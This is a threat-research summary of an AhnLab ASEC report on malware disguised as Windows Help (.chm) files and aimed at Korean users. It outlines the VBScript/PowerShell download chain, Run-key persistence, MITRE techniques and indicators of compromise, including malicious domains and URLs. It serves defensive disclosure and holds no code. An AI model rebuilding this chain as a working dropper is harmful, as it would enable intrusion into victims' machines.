Threat Research

APT Attack Being Distributed as Windows Help File (*.chm) – ASEC BLOG

Securonix

ASEC uncovered malware distributed as Windows Help Files (.chm) aimed at Korean users, delivered via compressed email attachments. When opened, the CHM dropper spawns VBScript and PowerShell payloads, persists through a Run key, and downloads a second-stage downloader from remote URLs. #CHM #MAGE #AhnLab #EncorPost

Keypoints

  • The campaign distributes malware disguised as a Windows Help File (*.chm) targeted at Korean users via compressed email attachments.
  • CHM files inside ZIP/RAR archives trigger further actions, including creation of Document.dat and Document.vbs in the user links folder.
  • Document.dat contains Base64-encoded data that is decoded into Document.vbs, which then initiates persistence and payload execution.
  • Document.vbs uses PowerShell to download an additional file (advupdate.exe) from remote URLs and execute it.
  • The malware persists by adding a Run key entry to HKCUSoftwareMicrosoftWindowsCurrentVersionRunDocument to ensure re-launch.
  • Multiple CHM samples and download URLs are observed, with several domain names and hashed indicators associated with the campaign.

MITRE Techniques

  • [T1566.001] Phishing: Spearphishing Attachment – The malware is distributed via an email attachment disguised as a Windows Help File (*.chm). β€œThe ASEC analysis team has recently discovered the distribution of malware disguised as a Windows Help File (*.chm)”
  • [T1036] Masquerading – The CHM file is disguised as an innocuous help file. β€œThe CHM file is also disguised as an innocuous help file.”
  • [T1059.005] VBScript – Document.vbs contains a code that uses powershell to download an additional file. β€œDocument.vbs contains a code that uses powershell to download an additional file as shown below.”
  • [T1059.001] PowerShell – The downloaded file is saved into the %tmp% folder as advupdate.exe and is executed. β€œThe downloaded file is saved into the %tmp% folder as advupdate.exe and is executed.”
  • [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys/Startup Folder – It adds to the path HKCUSoftwareMicrosoftWindowsCurrentVersionRunDocument so that the VBS file can be continuously run. β€œit adds to the path HKCUSoftwareMicrosoftWindowsCurrentVersionRunDocument so that the VBS file can be continuously run.”
  • [T1132.001] Data Encoding – Document.dat contains Base64-encoded data, and the decoded data is saved into Document.vbs. β€œDocument.dat contains Base64-encoded data, and the decoded data is saved into Document.vbs.”

Indicators of Compromise

  • [File Hash] context – 3ae6503e836b295955a828a76ce2efa7, d26481e376134dc14966ccab39b91f16, and 4 more hashes
  • [URL] context – hxxps://encorpost[.]com/post/post.php?type=1, hxxps://nhn-games[.]com/game03953/gamelist.php?type=1, and 2 more URLs
  • [Domain] context – encorpost.com, nhn-games.com, sktelecom[.]help, want-helper[.]com, and 2 more domains
  • [File Name] context – asset.chm, contract.chm, and 2 more CHM files
  • [File] context – advupdate.exe, Document.vbs
  • [Registry Key] context – HKCUSoftwareMicrosoftWindowsCurrentVersionRunDocument

Read more: https://asec.ahnlab.com/en/32800/